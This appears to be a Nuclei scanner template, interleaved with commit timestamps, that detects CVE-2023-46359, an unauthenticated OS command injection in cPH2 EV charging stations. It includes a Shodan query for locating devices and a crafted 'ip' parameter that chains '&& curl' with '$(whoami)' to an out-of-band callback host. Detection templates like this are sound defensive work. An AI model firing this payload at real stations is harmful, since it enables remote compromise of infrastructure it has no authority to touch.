2023-12-21 13:15:43 +00:00
id : CVE-2023-46359
info :
2023-12-22 04:32:09 +00:00
name : cPH2 Charging Station v1.87.0 - OS Command Injection
2023-12-21 13:15:43 +00:00
author : mlec
severity : critical
description : |
An OS command injection vulnerability in Hardy Barth cPH2 Ladestation v1.87.0 and earlier, may allow an unauthenticated remote attacker to execute arbitrary commands on the system via a specifically crafted arguments passed to the connectivity check feature.
remediation : Fixed in version 2.0.0
reference :
- https://www.offensity.com/en/blog/os-command-injection-in-cph2-charging-station-200-cve-2023-46359-and-cve-2023-46360/
- https://nvd.nist.gov/vuln/detail/CVE-2023-46359
classification :
2024-04-08 11:34:33 +00:00
cvss-metrics : CVSS:3.1/AV:A/AC:N/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score : 9.6
2023-12-21 13:15:43 +00:00
cve-id : CVE-2023-46359
metadata :
verified : true
max-request : 1
2023-12-22 04:32:09 +00:00
shodan-query : html:"Salia PLCC"
2024-01-14 09:21:50 +00:00
tags : cve2023,cve,salia-plcc,cph2,rce
2023-12-21 13:15:43 +00:00
http :
- method : GET
2023-12-21 13:23:43 +00:00
path :
2023-12-21 13:15:43 +00:00
- "{{BaseURL}}/connectioncheck.php?ip={{url_encode('127.0.0.1 && curl http://$(whoami).{{interactsh-url}}')}}"
matchers-condition : and
matchers :
- type : word
words :
- "<b>SUCCESS</b>"
- "127.0.0.1 && curl http://$(whoami).{{interactsh-url}}"
condition : and
2023-12-21 13:23:43 +00:00
2023-12-21 13:15:43 +00:00
- type : word
2023-12-22 04:32:09 +00:00
part : interactsh_protocol
2023-12-21 13:15:43 +00:00
words :
2023-12-22 04:32:09 +00:00
- "dns"
2024-01-26 08:31:11 +00:00
# digest: 4a0a0047304502203fa3579cee7f457c57f4c570aec49072afb073eb3669f6d1ce3fae59bda5bca8022100c56de69f4564bd736a8ec6c9c10256a835946eea129a254373943592eee6e773:922c64590222798bb761d5b6d8e72950